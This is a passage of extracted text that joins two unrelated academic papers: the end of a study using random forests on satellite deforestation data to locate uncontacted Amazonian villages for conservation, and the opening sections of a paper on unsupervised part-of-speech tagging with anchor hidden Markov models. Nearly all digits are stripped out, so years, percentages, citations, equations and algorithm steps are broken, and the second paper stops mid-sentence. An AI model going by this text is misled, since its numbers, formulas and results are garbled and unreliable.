walker, hamilton & groth, ). our central goal is to gather as much information on isolated indigenous populations as possible without attempting any direct contact (kesler & walker, ). we maximize the use of available technologies to gather data remotely with no interference. satellite imagery offers a safe, low-cost, and noninvasive method for studying population dynamics and spatial ecology of indigenous populations (walker, kesler & hill, ). similarly important is the need to understand spatial resource needs of indigenous societies in a region heavily impacted by deforestation, as well as the potential importance of connections among subpopulations, known to contribute to population viability (levins, ; hanski, ). the irreversible threats from large-scale habitat loss via deforestation and conversion of land to agriculture and pasture paint a bleak future for uncontacted populations (fagan & shoobridge, ; salisbury & fagan, ; walker, kesler & hill, ). the hope is that better data and methods can contribute improvements to this complex issue. applied machine learning is a vital tool for conservation work as a means to both collect and analyze more data at faster rates (murray et al., a). the growing use of machine learning methods to analyze large sets of biological, biophysical, spectral and climatological data has enabled accurate differentiation of the world’s landscapes (pettorelli et al., ). more germane to our work are forest classification projects (hansen et al., ; murray et al., b). the global forest change dataset was developed by classifying pixels using or more high-resolution global composite images as predictors, each developed from over , landsat images (hansen et al., ). the random forest algorithm is known to give excellent classification results and relatively quick processing speed (du et al., ; pal, ; rodriguez-galiano et al., ). random forests (breiman, ) are an ensemble supervised learning method that builds multiple decisions trees used here for the classification of village class (uncontacted versus contacted). random forests operate by constructing a multitude of decision trees. some of the advantages of random forests are that they are robust to inclusion of features that are irrelevant to classification, and they are invariant to transformations of feature variables (belgiu & drăguţ, ). for these reasons, the random forest algorithm is popular for remote sensing data given its accuracy, speed, and ability to handle high data dimensionality and multicollinearity. walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. materials & methods data we combined the exact locations (centroids) of uncontacted and contacted indigenous villages (walker, kesler & hill, ). more information about our general project along with high-resolution imagery for uncontacted villages is available at https://isolatedtribes.missouri.edu. the locations of uncontacted villages were originally derived from scouring high-resolution imagery using a combination of undergraduate helpers and various maps made by governmental and non-governmental agencies in colombia, ecuador, peru and especially brazil. several additional locations have been pieced together from governmental reports and news stories stemming from overflights. contacted villages are from the brazilian government website (http://www.funai.gov.br/), and we included all of those that were in western amazonia (west of degrees longitude, fig. ). hansen and colleagues’ ( ) global forest change (gfc) project provides small-scale deforestation at approximately m resolution from landsat sensors extending back to the year . gfc version . goes up through the year . we extracted the amount of detected deforestation in × km squares surrounding each village’s centroid and took the maximum area cleared in any one particular year from across the -year period. we refer to this measure as cleared area as it includes both the village and associated gardens but not those of neighboring villages. in addition, our dataset has other features, including regional population density in the nearest square km (ciesin, ), elevation at m digital resolution from the space shuttle radar topography mission (rabus et al., ), and distance to populated places at m resolution (balk et al., ). we also included a local lights-at-night measure at km resolution (pritchard, , from https://earthobservatory.nasa.gov) using the distance from village centroid to the nearest detected lights. finally, distance to rivers of all the different strahler stream orders using the global self-consistent, hierarchical, high-resolution geography database (wessel & smith, ), along with the minimum distance to combined rivers of strahler stream orders , , and , giving a total of features used to train algorithms. models machine learning algorithms were performed with the r package caret. we found that an untuned random forest algorithm had a fairly high combination of sensitivity (true positive rate) and specificity (true negative rate) in the . to . range. as mentioned above, random forest algorithm is an ensemble classifier that produces multiple decision trees, using a randomly selected subset of training samples and variables. other algorithms such as neural networks, extreme gradient boosting tree, and lasso logistic regression were also relatively-high performing but gave slightly lower values on one or the other metric. the target classes in our sample are imbalanced with only . % of villages in the sample being uncontacted. during model training we noticed that varying the detection cutoff (also known as the threshold) that classifies villages into one class or the other had large effects on the results (the default cutoff is . majority rule). in addition, common loss walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://isolatedtribes.missouri.edu http://www.funai.gov.br/ https://earthobservatory.nasa.gov http://dx.doi.org/ . /peerj-cs. − − − − longitude la tit u d e contacted uncontacted figure map of study locations. map of contacted indigenous villages in brazil and uncontacted indigenous villages in brazil, colombia, ecuador, and peru that were included in the study. full-size doi: . /peerjcs. /fig- metrics such as the area under the roc curve or the f score tended to give either high specificity or sensitivity with our data, but not both. to address the imbalanced data issue and improve model performance, we used a random forest algorithm that iteratively tuned the cutoff value such as to simultaneously maximize both specificity (true negative rate) and sensitivity (true positive rate). in other words, we instituted cost-sensitive learning into the random forest (elkan, ; zadrozny, langford & abe, ; khoshgoftaar, golawala & hulse, ). the loss metric we used for training is the distance from a perfect model of sensitivity of and specificity of . we used , trees with variables available for splitting at each tree node. to evaluate models we used a leave-one-out cross-validation (non-nested) looped over a range of cutoffs from . to . in increments of . . raising the cutoff value means a higher level of evidence (i.e., more decision trees out of the total , trees that comprise the random forest) is walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . cutoff sensitivity specificity distance figure model metrics obtained from training the random forest model across a range of cutoffs from . to . in increments of . . to train the random forest model we used leave-one-out cross- validation across a range of cutoffs from . to . in increments of . . raising the cutoff value means a higher level of evidence is needed to assign the positive class (uncontacted), which decreases sensitivity (true positive rate) and increases specificity (true negative rate). here the optimal cutoff ( . ) gives a per- fect cross-validated sensitivity of . and a specificity of . . the distance is the distance from a perfect model which is minimized during training. full-size doi: . /peerjcs. /fig- needed to assign the positive class (uncontacted) so it decreases sensitivity and increases specificity. here a sensitive cutoff of . yields a minimal distance metric and the desired combination of high sensitivity and specificity metrics (fig. ). results our random forest algorithm, with an optimally-tuned cutoff of . , yields a sensitivity of . and a specificity of . using leave-one-out cross-validation. this means that all uncontacted villages are correctly classified and % of the contacted villages are correctly classified. therefore, our model has a strong ability to automatically distinguish between contacted and uncontacted villages. in order of descending variable importance, uncontacted villages have ( ) smaller cleared areas, ( ) longer distances from lights, ( ) higher elevation, ( ) longer distances to populated places, ( ) lower regional population density, ( ) longer distances from rivers of all strahler stream orders up to and including , and ( ) shorter distances to rivers of levels and . figure shows density plot comparisons for the top features in terms of variable importance. walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. contacted uncontacted . . . . . cleared area (ha) d e n si ty a . . . . distance to lights (km) d e n si ty b . . . . elevation (m) d e n si ty c . . . . distance to town (km) d e n si ty d figure smoothed kernel density plots comparing uncontacted to contacted indigenous villages. the top four distinguishing features in terms of variable importance in the random forest model are uncon- tacted villages have (a) smaller cleared areas, (b) farther distances to satellite-detected lights at night, (c) higher elevation, and (d) farther distances to populated places, on average. a and c are best visualized on log scales. full-size doi: . /peerjcs. /fig- given the success of our algorithm during cross-validation, we then moved to implement it for predictive purposes. we did a grid search of all × km squares within a km radius of the five clusters of known uncontacted villages (fig. ). this approach does produce a high number of false positives created by natural clearings (e.g., landslides, windfalls, etc.). fortunately, most natural clearings can be eliminated by simply removing all clearings that are less than . ha. this left us with a sample of clearings. of these we were able to obtain high resolution imagery for eight of these and three contained newly-identified villages. one of these in colombia appears to be currently inhabited given that it has a single longhouse structure and shows recently made clearings in global land walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. analysis and discovery (glad, tyukavina et al., ). the glad alert system processes landsat imagery as it becomes available to identify tree cover change in near real-time. this is an invaluable system for monitoring both recent activity by uncontacted villages, as well as encroaching deforestation from outsiders. the other two newly-discovered sites are historical villages. one is from the uncontacted yanomami in northern brazil inhabited from around year or earlier and until . the other is from pano speakers on the border between peru and brazil and was probably inhabited during a similar time period. the other five possible locations identified by the random forest predictions with high resolution imagery available all appeared to be natural. therefore, we estimate our testing precision with this small sample as . ( true positives divided by total cases). discussion we used deforestation data from landsat satellites to train algorithms to identify the locations of uncontacted indigenous groups in amazonia as part of an ongoing effort to better understand their conservation status and threats. our results show that uncontacted villages have smaller cleared areas, reside at higher elevations, and are farther from populated places and satellite-detected lights at night. our random forest algorithm with an optimally-tuned cutoff has cross-validated performance metrics of over %. the case of the uncontacted yanomami (also known as the moxihatetea) is a good example of the importance of a near real-time monitoring system. their previous village was abandoned in late and the brazilian indigenous agency (funai) and the yanomami indigenous association (hutukara) were particularly worried that some disaster had befallen them since much of the nearby area has seen invasions by gold miners. for a year and a half their whereabouts were unknown. we began looking for them using landsat data, but it was the remote sensing fire alerts (firms, davies et al., ) that first alerted us to their exact location. we tasked a digitalglobe satellite image on may , and were relieved to find out that they were alive and well and clearing large gardens. the number of sections in their shabono village structure had increased from to . we relayed this information on to funai and hutukara who then organized a flyover to officially confirm the location. remote sensing provides many advantages over flyovers, and we actually do not recommend them. as we have shown, the information provided solely by remote sensing is sufficient to identify uncontacted villages. remote sensing is safe, low-cost, and noninvasive, while flyovers are not. population estimates are also crucial information for assessing trends in the demographic health of isolated populations by measuring areas of fields, villages, and houses in satellite imagery. heads-up digitization of satellite imagery provides better population estimates than do flyovers where most people are not visible because many hide or run away in fear. remote sensing offers the benefits of time-stamped evidence of occupation of areas inhabited by isolated populations, along with movements through time (walker, kesler & hill, ). walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusions a dozen easily obtainable remote sensing measures allowed our random forest algorithm to successfully classify uncontacted versus contacted villages. extending the algorithm to make predictions in a grid search greatly accelerates our ability to find and identify the locations of uncontacted villages. moving forward we anticipate using an even lower cutoff value because the decreasing costs in satellite imagery make false positives from a more sensitive algorithm relatively cheap to evaluate and discard. we anticipate that this method will become the primary means by which to track and locate these same uncontacted villages, as well as undiscovered locations of uncontacted villages. one shortcoming of our classification model when applied to searching through unlabeled satellite imagery is that it was not designed to classify natural landslides, windfalls, or riverbank clearings. all of these natural processes also create deforestation signatures that further complicate our searches. future work could well include these, but in the meantime we filter our predictions based on cleared area because natural clearings tend to be less than . ha while most uncontacted villages have larger areas than that. our research is vital and timely as isolated groups are among the last remaining small- scale subsistence populations living in a traditional lifestyle. the enormous and mounting pressure from external threats create the possibility that isolated populations will disappear in the near future. better monitoring and tracking with remote sensing are tools that might provide more informed conservation decisions concerning increased protection and land rights for the world’s most critically-endangered human cultures. acknowledgements we thank mark flinn and the comparative methods course at the university of missouri for their help and suggestions. additional information and declarations funding this work was supported by a national geographic society research and exploration grant (# - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national geographic society research and exploration grant: # - . competing interests the authors declare there are no competing interests. author contributions • robert s. walker and marcus j. hamilton conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the raw remote sensing variables are available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references balk dl, deichmann u, yetman g, pozzi f, hay si, nelson a. . determining global population distribution: methods, applications and data. advances in parasitology : – doi . /s - x( ) - . belgiu m, drăguţ l. . random forest in remote sensing: a review of applications and future directions. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . bodard l. . green hell: massacre of the brazilian indians. new york: dutton. breiman l. . random forests. machine learning : – doi . /a: . castillo bh. . indigenous peoples in isolation in the peruvian amazon. copenhagen: international work group for indigenous affairs. center for international earth science information network (ciesin). . gridded population of the world: population density grid. palisades: columbia university, centro internacional de agricultura tropical. davies dk, ilavajhala s, wong mm, justice co. . fire information for resource management system: archiving and distributing modis active fire data. ieee trans- actions on geoscience and remote sensing : – doi . /tgrs. . . du p, samat a, waske b, liu s, li z. . random forest and rotation forest for fully polarized sar image classification using polarimetric and spatial features. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . elkan c. . the foundations of cost-sensitive learning. proceedings of the ieee international joint conference on artificial intelligence : – . fagan c, shoobridge d. . an investigation of illegal mahogany logging in peru’s alto national park and its surroundings’. durham: parkswatch. hamilton mj, walker rs, kesler d. . crash and rebound of indigenous populations in lowland south america. scientific reports ( ) doi . /srep . hansen mc, potapov pv, moore r, hancher m, turubanova sa, tyukavina a, thau d, stehman sv, goetz sj, loveland tr, kommareddy a. . high- resolution global maps of st-century forest cover change. science : – doi . /science. . walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - x( ) - http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /srep http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. hanski i. . metapopulation ecology. oxford: oxford university press. hemming j. . red gold: the conquest of the brazilian indians. cambridge: harvard university press. hurtado am, hill kr, kaplan h, lancaster j. . the epidemiology of infectious diseases among south american indians: a call for guidelines for ethical research. current anthropology : – doi . / . kesler dc, walker rs. . geographic distribution of isolated indigenous societies in amazonia and the efficacy of indigenous territories. plos one :e doi . /journal.pone. . khoshgoftaar tm, golawala m, van hulse j. . an empirical study of learning from imbalanced data using random forest. ieee artificial intelligence tools : – . levins r. . some demographic and genetic consequences of environmental het- erogeneity for biological control. bulletin of the entomological society of america : – . murray nj, keith da, bland lm, ferrari r, lyons mb, lucas r, pettorelli n, nicholson e. a. the role of satellite remote sensing in structured ecosystem risk assess- ments. science of the total environment : – doi . /j.scitotenv. . . . murray nj, keith da, simpson d, wilshire jh, lucas rm. b. remap: an online remote sensing application for land cover classification and monitoring. methods in ecology and evolution : – doi . / - x. . pal m. . random forest classifier for remote sensing classification. international journal of remote sensing : – doi . / . pettorelli n, laurance wf, o’brien tg, wegmann m, nagendra h, turner w. . satellite remote sensing for applied ecologists: opportunities and challenges. journal of applied ecology : – doi . / - . . pritchard sb. . the trouble with darkness: nasa’s suomi satellite images of earth at night. environmental history : – doi . /envhis/emw . rabus b, eineder m, roth a, bamler r. . the shuttle radar topography mission—a new class of digital elevation models acquired by spaceborne radar. isprs journal of photogrammetry and remote sensing : – doi . /s - ( ) - . ricardo b, ricardo f. . povos indígenas no brasil. são paulo: instituto socioambien- tal. rodriguez-galiano vf, ghimire b, rogan j, chica-olmo m, rigol-sanchez jp. . an assessment of the effectiveness of a random forest classifier for land-cover classification. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . salisbury ds, fagan c. . coca and conservation: cultivation, eradication, and traf- ficking in the amazon borderlands. geoj : – doi . /s - - -x. tyukavina a, hansen mc, potapov pv, krylov am, goetz sj. . pan-tropical hinter- land forests: mapping minimally disturbed forests. global ecology and biogeography : – doi . /geb. . walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.scitotenv. . . http://dx.doi.org/ . / - x. http://dx.doi.org/ . / http://dx.doi.org/ . / - . http://dx.doi.org/ . /envhis/emw http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /geb. http://dx.doi.org/ . /peerj-cs. vaz a. . isolados no brasil. política de estado: da tutela para a política de direitos— uma questão resolvida? brasília: estação gráfica. walker rs, hamilton mj. . amazonian societies on the brink of extinction. american journal of human biology : – doi . /ajhb. . walker rs, hamilton mj, groth aa. . remote sensing and conservation of isolated indigenous villages in amazonia. royal society open science ( ): doi . /rsos. . walker rs, hill kr. . protecting isolated tribes. science : doi . /science.aac . walker rs, kesler dc, hill kr. . are isolated indigenous populations headed toward extinction? plos one :e doi . /journal.pone. . wallace s. . the unconquered: in search of the amazon’s last uncontacted tribes. new york: random house llc. wessel p, smith whf. . a global, self-consistent, hierarchical, high-resolution shoreline database. journal of geophysical research : – doi . / jb . zadrozny b, langford j, abe n. . cost-sensitive learning by cost-proportionate example weighting. proceedings of the ieee international conference on data mining : – . walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ajhb. http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /science.aac http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / jb http://dx.doi.org/ . /peerj-cs. unsupervised part-of-speech tagging with anchor hidden markov models karl stratos, michael collins∗ and daniel hsu department of computer science, columbia university {stratos, mcollins, djhsu}@cs.columbia.edu abstract we tackle unsupervised part-of-speech (pos) tagging by learning hidden markov models (hmms) that are particularly well-suited for the problem. these hmms, which we call an- chor hmms, assume that each tag is associ- ated with at least one word that can have no other tag, which is a relatively benign con- dition for pos tagging (e.g., “the” is a word that appears only under the determiner tag). we exploit this assumption and extend the non-negative matrix factorization framework of arora et al. ( ) to design a consistent estimator for anchor hmms. in experiments, our algorithm is competitive with strong base- lines such as the clustering method of brown et al. ( ) and the log-linear model of berg- kirkpatrick et al. ( ). furthermore, it pro- duces an interpretable model in which hidden states are automatically lexicalized by words. introduction part-of-speech (pos) tagging without supervision is a quintessential problem in unsupervised learning for natural language processing (nlp). a major ap- plication of this task is reducing annotation cost: for instance, it can be used to produce rough syntactic annotations for a new language that has no labeled data, which can be subsequently refined by human annotators. hidden markov models (hmms) are a natural choice of model and have been a workhorse for this problem. early works estimated vanilla hmms ∗currently on leave at google inc. new york. with standard unsupervised learning methods such as the expectation-maximization (em) algorithm, but it quickly became clear that they performed very poorly in inducing pos tags (merialdo, ). later works improved upon vanilla hmms by incorporat- ing specific structures that are well-suited for the task, such as a sparse prior (johnson, ) or a hard-clustering assumption (brown et al., ). in this work, we tackle unsupervised pos tagging with hmms whose structure is deliberately suitable for pos tagging. these hmms impose an assump- tion that each hidden state is associated with an ob- servation state (“anchor word”) that can appear un- der no other state. for this reason, we denote this class of restricted hmms by anchor hmms. such an assumption is relatively benign for pos tagging; it is reasonable to assume that each pos tag has at least one word that occurs only under that tag. for example, in english, “the” is an anchor word for the determiner tag; “laughed” is an anchor word for the verb tag. we build on the non-negative matrix factoriza- tion (nmf) framework of arora et al. ( ) to de- rive a consistent estimator for anchor hmms. we make several new contributions in the process. first, to our knowledge, there is no previous work di- rectly building on this framework to address unsu- pervised sequence labeling. second, we generalize the nmf-based learning algorithm to obtain exten- sions that are important for empirical performance (table ). third, we perform extensive experiments on unsupervised pos tagging and report competitive results against strong baselines such as the cluster- ing method of brown et al. ( ) and the log-linear transactions of the association for computational linguistics, vol. , pp. – , . action editor: hinrich schütze. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. model of berg-kirkpatrick et al. ( ). one characteristic of the approach is the imme- diate interpretability of inferred hidden states. be- cause each hidden state is associated with an obser- vation, we can examine the set of such anchor obser- vations to qualitatively evaluate the learned model. in our experiments on pos tagging, we find that an- chor observations correspond to possible pos tags across different languages (table ). this property can be useful when we wish to develop a tagger for a new language that has no labeled data; we can label only the anchor words to achieve a complete label- ing of the data. this paper is structured as follows. in section , we establish the notation we use throughout. in sec- tion , we define the model family of anchor hmms. in section , we derive a matrix decomposition al- gorithm for estimating the parameters of an anchor hmm. in section , we present our experiments on unsupervised pos tagging. in section , we discuss related works. notation we use [n] to denote the set of integers { , . . . ,n}. we use e[x] to denote the expected value of a ran- dom variable x. we define ∆m− := {v ∈ rm : vi ≥ ∀i, ∑ i vi = }, i.e., the (m− )-dimensional probability simplex. given a vector v ∈ rm, we use diag(v) ∈ rm×m to denote the diagonal matrix with v . . .vm on the main diagonal. given a matrix m ∈ rn×m, we write mi ∈ rm to denote the i-th row of m (as a column vector). the anchor hidden markov model definition . . an anchor hmm (a-hmm) is a - tuple (n,m,π,t,o,a) for positive integers n,m and functions π,t,o,a where • [n] is a set of observation states. • [m] is a set of hidden states. • π(h) is the probability of generating h ∈ [m] in the first position of a sequence. • t(h′|h) is the probability of generating h′ ∈ [m] given h ∈ [m]. • o(x|h) is the probability of generating x ∈ [n] given h ∈ [m]. • a(h) := {x ∈ [n] : o(x|h) > ∧ o(x|h′) = ∀h′ = h} is non-empty for each h ∈ [m]. in other words, an a-hmm is an hmm in which each hidden state h is associated with at least one “anchor” observation state that can be generated by, and only by, h. note that the anchor condition im- plies n ≥ m. an equivalent definition of an a-hmm is given by organizing the parameters in matrix form. under this definition, an a-hmm has parameters (π,t,o) where π ∈ rm is a vector and t ∈ rm×m,o ∈ rn×m are matrices whose entries are set to: • πh = π(h) for h ∈ [m] • th′,h = t(h′|h) for h,h′ ∈ [m] • ox,h = o(x|h) for h ∈ [m],x ∈ [n] the anchor condition implies that rank(o) = m. to see this, consider the rows oa . . .oam where ah ∈ a(h). since each oah has a single non-zero entry at the h-th index, the columns of o are linearly independent. we assume rank(t) = m. an important special case of a-hmm introduced by brown et al. ( ) is defined below. under this a-hmm, every observation state is an anchor of some hidden state. definition . . a brown model is an a-hmm in which a( ) . . .a(m) partition [n]. parameter estimation for a-hmms we now derive an algorithm for learning a-hmms. the algorithm reduces the learning problem to an instance of nmf from which the model parameters can be computed in closed-form. . nmf we give a brief review of the nmf method of arora et al. ( ). (exact) nmf is the following problem: given an n × d matrix a = bc where b ∈ rn×m and c ∈ rm×d have non-negativity constraints, re- cover b and c. this problem is np-hard in general (vavasis, ), but arora et al. ( ) provide an exact and efficient method when a has the follow- ing special structure: condition . . a matrix a ∈ rn×d satisfies this condition if a = bc for b ∈ rn×m and c ∈ rm×d where anchor-nmf input: a ∈ rn×d satisfying condition . with a = bc for some b ∈ rn×m and c ∈ rm×d, value m • for h = . . .m, find a vertex ah as u ← gram-schmidt({aal}h− l= ) ah ← arg max x∈[n] ∣∣∣∣ax −uu>ax ∣∣∣∣ where gram-schmidt({aal}h− l= ) is the gram- schmidt process that orthonormalizes {aal}h− l= . • for x = . . .n, recover the x-th row of b as bx ← arg min u∈∆m− ∣∣∣∣∣ ∣∣∣∣∣ax − m∑ h= uhaah ∣∣∣∣∣ ∣∣∣∣∣ ( ) • set c = [aa . . .aam ]>. output: b and c such that b>h = b > ρ(h) and ch = cρ(h) for some permutation ρ : [m] → [m] figure : non-negative matrix factorization algorithm of arora et al. ( ). . for each x ∈ [n], bx ∈ ∆m− . i.e., each row of b defines a probability distribution over [m]. . for each h ∈ [m], there is some ah ∈ [n] such that bah,h = and bah,h′ = for all h ′ = h. . rank(c) = m. since rank(b) = rank(c) = m (by property and ), the matrix a must have rank m. note that by property , each row of a is given by a convex com- bination of the rows of c: for x ∈ [n], ax = m∑ h= bx,h ×ch furthermore, by property each h ∈ [m] has an as- sociated row ah ∈ [n] such that aah = cah . these properties can be exploited to recover b and c. a concrete algorithm for factorizing a matrix sat- isfying condition . is given in figure (arora et al., ). it first identifies a . . .am (up to some permutation) by greedily locating the row of a furthest away from the subspace spanned by the vertices selected so far. then it recovers each bx as the convex coefficients required to combine aa . . .aam to yield ax. the latter computation ( ) can be achieved with any constrained optimization method; we use the frank-wolfe algorithm (frank and wolfe, ). see arora et al. ( ) for a proof of the correctness of this algorithm. . random variables to derive our algorithm, we make use of cer- tain random variables under the a-hmm. let (x , . . . ,xn ) ∈ [n]n be a random sequence of n ≥ observations drawn from the model, along with the corresponding hidden state sequence (h , . . . ,hn ) ∈ [m]n ; independently, pick a posi- tion i ∈ [n − ] uniformly at random. let yi ∈ rd be a d-dimensional vector which is conditionally in- dependent of xi given hi, i.e., p(yi|hi,xi) = p(yi|hi). we will provide how to define such a variable in section . . : yi will be a function of (x , . . . ,xn ) serving as a “context” representation of xi revealing the hidden state hi. define unigram probabilities u∞,u ∈ rn and bigram probabilities b ∈ rn×n where u∞x := p(xi = x) ∀x ∈ [n] u x := p(xi = x|i = ) ∀x ∈ [n] bx,x′ := p(xi = x,xi+ = x′) ∀x,x′ ∈ [n] additionally, define π̄ ∈ rm where π̄h = p(hi = h) ∀h ∈ [m] ( ) we assume π̄h > for all h ∈ [m]. . derivation of a learning algorithm the following proposition provides a way to use the nmf algorithm in figure to recover the emission parameters o up to scaling. proposition . . let xi ∈ [n] and yi ∈ rd be respectively an observation and a context vector drawn from the random process described in sec- tion . . define a matrix Ω ∈ rn×d with rows Ωx = e[yi|xi = x] ∀x ∈ [n] ( ) if rank(Ω) = m, then Ω satisfies condition . : Ω = õΘ where õx,h = p(hi = h|xi = x) and Θh = e[yi|hi = h]. proof. e[yi|xi = x] = m∑ h= p(hi = h|xi = x) × e[yi|hi = h,xi = x] = m∑ h= p(hi = h|xi = x) × e[yi|hi = h] the last equality follows by the conditional inde- pendence of yi. this shows Ω = õΘ. by the an- chor assumption of the a-hmm, each h ∈ [m] has at least one x ∈ a(h) such that p(hi = h|xi = x) = , thus Ω satisfies condition . . a useful interpretation of Ω in proposition . is that its rows Ω . . . Ωn are d-dimensional vec- tor representations of observation states forming a convex hull in rd. this convex hull has m ver- tices Ωa . . . Ωam corresponding to anchors ah ∈ a(h) which can be convexly combined to realize all Ω . . . Ωn. given õ, we can recover the a-hmm parameters as follows. first, we recover the stationary state dis- tribution π̄ as: π̄h = ∑ x∈[n] p(hi = h|xi = x) ×p(xi = x) = ∑ x∈[n] õx,h ×u∞x the emission parameters o are given by bayes’ the- orem: ox,h = p(hi = h|xi = x) ×p(xi = x)∑ x∈[n] p(hi = h|xi = x) ×p(xi = x) = õx,h ×u∞x π̄h using the fact that the emission probabilities are position-independent, we see that the initial state distribution π satisfies u = oπ: u x = p(xi = x|i = ) = ∑ h∈[m] p(xi = x|hi = h,i = ) ×p(hi = h|i = ) = ∑ h∈[m] ox,h ×πh learn-anchor-hmm input: Ω in proposition . , number of hidden states m, bigram probabilities b, unigram probabilities u∞,u • compute (õ, Θ) ← anchor-nmf(Ω,m). • recover the parameters: π̄ ← õ>u∞ ( ) o ← diag(π̄)− diag(u∞)õ ( ) π = o+u ( ) t ← (diag(π̄)− o+b(o>)+)> ( ) output: a-hmm parameters (π,t,o) figure : nmf-based learning algorithm for a-hmms. the algorithm anchor-nmf is given in figure . thus π can be recovered as π = o+u where o+ is the moore–penrose pseudoinverse of o. fi- nally, it can be algebraically verified that b = odiag(π̄)t>o> (hsu et al., ). since all the in- volved matrices have rank m, we can directly solve for t as t = (diag(π̄)− o+b(o>)+)> figure shows the complete algorithm. as input, it receives a matrix Ω satisfying proposition . , the number of hidden states, and the probabilities of ob- served unigrams and bigrams. it first decomposes Ω using the nmf algorithm in figure . then it computes the a-hmm parameters whose solution is given analytically. the following theorem guarantees the consis- tency of the algorithm. theorem . . let (π,t,o) be an a-hmm such that rank(t) = m and π̄ defined in ( ) has strictly pos- itive entries π̄h > . given random variables Ω satisfying proposition . and b,u∞,u under this model, the algorithm learn-anchor-hmm in fig- ure outputs (π,t,o) up to a permutation on hid- den states. proof. by proposition . , Ω satisfies condition . with Ω = õΘ, thus õ can be recovered up to a permutation on columns with the algorithm anchor- nmf. the consistency of the recovered parameters follows from the correctness of ( – ) under the rank conditions. . . constrained optimization for π and t note that ( ) and ( ) require computing the pseu- doinverse of the estimated o, which can be expen- sive and vulnerable to sampling errors in practice. to make our parameter estimation more robust, we can explicitly impose probability constraints. we re- cover π by solving: π = arg min π′∈∆m− ∣∣∣∣u −oπ′ ∣∣∣∣ ( ) which can again be done with algorithms such as frank-wolfe. we recover t by maximizing the log likelihood of observation bigrams ∑ x,x′ bx,x′ log   ∑ h,h′∈[m] π̄hox,hth′,hox′,h′   ( ) subject to the constraint (t>)h ∈ ∆m− . since ( ) is concave in t with other parameters o and π̄ fixed, we can use em to find the global optimum. . construction of the convex hull Ω in this section, we provide several ways to construct a convex hull Ω satisfying proposition . . . . choice of the context yi in order to satisfy proposition . , we need to de- fine the context variable yi ∈ rd with two proper- ties: • p(yi|hi,xi) = p(yi|hi) • the matrix Ω with rows Ωx = e[yi|xi = x] ∀x ∈ [n] has rank m. a simple construction (arora et al., ) is given by defining yi ∈ rn to be an indicator vector for the next observation: [yi]x′ = { if xi+ = x′ otherwise ( ) the first condition is satisfied since xi+ does not depend on xi given hi. for the second condition, observe that Ωx,x′ = p(xi+ = x′|xi = x), or in matrix form Ω = diag (u∞)− b ( ) under the rank conditions in theorem . , ( ) has rank m. more generally, we can let yi be an observation (encoded as an indicator vector as in ( )) randomly drawn from a window of l ∈ n nearby observa- tions. we can either only use the identity of the cho- sen observation (in which case yi ∈ rn) or addi- tionally indicate the relative position in the window (in which case yi ∈ rnl). it is straightforward to verify that the above two conditions are satisfied un- der these definitions. clearly, ( ) is a special case with l = . . . reducing the dimension of Ωx with the definition of Ω in the previous section, the dimension of Ωx is d = o(n) which can be dif- ficult to work with when n � m. proposition . allows us to reduce the dimension as long as the fi- nal matrix retains the form in ( ) and has rank m. in particular, we can multiply Ω by any rank-m projec- tion matrix Π ∈ rd×m on the right side: if Ω sat- isfies the properties in proposition . , then so does ΩΠ with m-dimensional rows (ΩΠ)x = e[yiΠ|xi = x] since rank(Ω) = m, a natural choice of Π is the projection onto the best-fit m-dimensional subspace of the row space of Ω. we mention that previous works on the nmf- learning framework have employed various projec- tion methods, but they do not examine relative mer- its of their choices. for instance, arora et al. ( ) simply use random projection, which is convenient for theoretical analysis. cohen and collins ( ) use a projection based on canonical correlation anal- ysis (cca) without further exploration. in con- trast, we give a full comparison of valid construc- tion methods and find that the choice of Ω is crucial in practice. . . construction of Ω for the brown model we can formulate an alternative way to construct a valid Ω when the model is further restricted to be a brown model. since every observation is an anchor, ox ∈ rm has a single nonzero entry for every x. thus the rows defined by Ωx = ox/ ||ox|| (an in- dicator vector for the unique hidden state of x) form input: bigram probabilities b, unigram probabilities u∞, number of hidden states m, construction method τ scaled matrices: ( √ · is element-wise) b := diag (u∞)− / bdiag (u∞)− / b̃ := diag (√ u∞ )− / √ bdiag (√ u∞ )− / singular vectors: u(m) (v (m)) is an n×m matrix of the left (right) singular 